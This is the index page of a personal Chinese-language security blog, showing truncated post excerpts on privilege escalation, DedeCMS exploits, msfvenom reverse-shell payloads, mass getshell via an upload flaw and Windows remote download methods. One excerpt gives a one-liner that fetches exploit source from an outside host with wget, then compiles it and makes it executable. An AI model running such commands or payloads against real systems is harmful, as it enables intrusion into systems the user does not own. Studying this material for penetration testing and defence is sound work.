Life's blog

记一次mysql提权

刚从外地回来,crazy就丢了一个shell来看了一下环境: iis php aspx(php的shell)web目录不可写 (what fuck,shell是咋来的,用Cacls看了一下,是被人设置只读了)有杀毒(赛门铁克) 拿到shell,发现可以执行命令,08r2,补丁很少,梭梭的 ...
Read more

更新msf5.0

= =之前就听说5.0出来了,一直懒得弄,报错一堆,不同ruby版本的报错还不一样,很难受……….环境: ubuntu 17.10win的话,有空再填 ruby 2.3.6p384 (2017-12-14) [x86_64-linux-gnu] (这个地方版本自己用rvm切换) ...
Read more

ubuntu本地提权复现

ubuntu本地提权exp: wget -P /tmp http://cyseclabs.com/exploits/upstream44.c &&cd /tmp && gcc -o exp upstream44.c && chmod 777 ...
Read more

dede通配符爆破后台~

通配符
emmmmmm,再也不用担心找不到dede的后台了~~(只支持win) exp(php):https://xianzhi.aliyun.com/forum/topic/2064 exp(python3):https://mochazz.github.io/2018/02/26/DEDEC ...
Read more

dedecms_v5.7_sp2代码执行漏洞复现

dedecms
原文:https://mp.weixin.qq.com/s/bGvvowkp0xcPNAvffQ1kRA emmmmmmmmm…….这个洞得登陆后台…………. 先访问127.0.0.1/dede/tpl.php?action=upload#右键查看源代码获取token…..#老版本这个文件 ...
Read more

msfvenom的一些常规操作

msfvenom
msfvenom的用法,= =。。。。 msfvenom -l payloads #查看所有payload msfvenom -p windows/meterpreter/reverse_tcp –payload-options#查看指定payload需要的参数 msfveno ...
Read more

发卡平台的批量getshell

发卡
老板前几天日了个xx站,我对那个发卡平台的很感兴趣,所以。。。。。。。。文章链接:https://www.luolikong.vip/index.php/archives/369/ 翻了一下,发现,上传logo处可以直接getshell,也没过滤,会被直接改名为logo.php 这不是本 ...
Read more

hexo-renderer-sass的报错

报错
emmmm,环境炸了重新搭建的时候,install hexo-renderer-sass遇到了报错,如下 emmmmmmmmmmm,查了一下百度,各种说换源啥的,换了之后也是一样的报错………………. 最后找到了解决方法 npm rebuild node-sass 参考:https:/ ...
Read more

x86_64-linux-gnu-gcc的报错

报错
= =。。。在ubuntu上面安装w3af的时候pip爆了这个错,去查了一下,一条命令下来就ok了参考:https://github.com/scrapy/scrapy/issues/2115 python3: sudo apt-get install python3 python-dev ...
Read more

win远程下载文件的各种姿势~

win 远程下载
收集了两篇关于win下的远程下载方式,仔细阅读了一下,才发现,原来这么强大~ http://www.cnblogs.com/backlion/p/7908563.html http://www.freebuf.com/articles/system/155147.html
Read more
Prev Next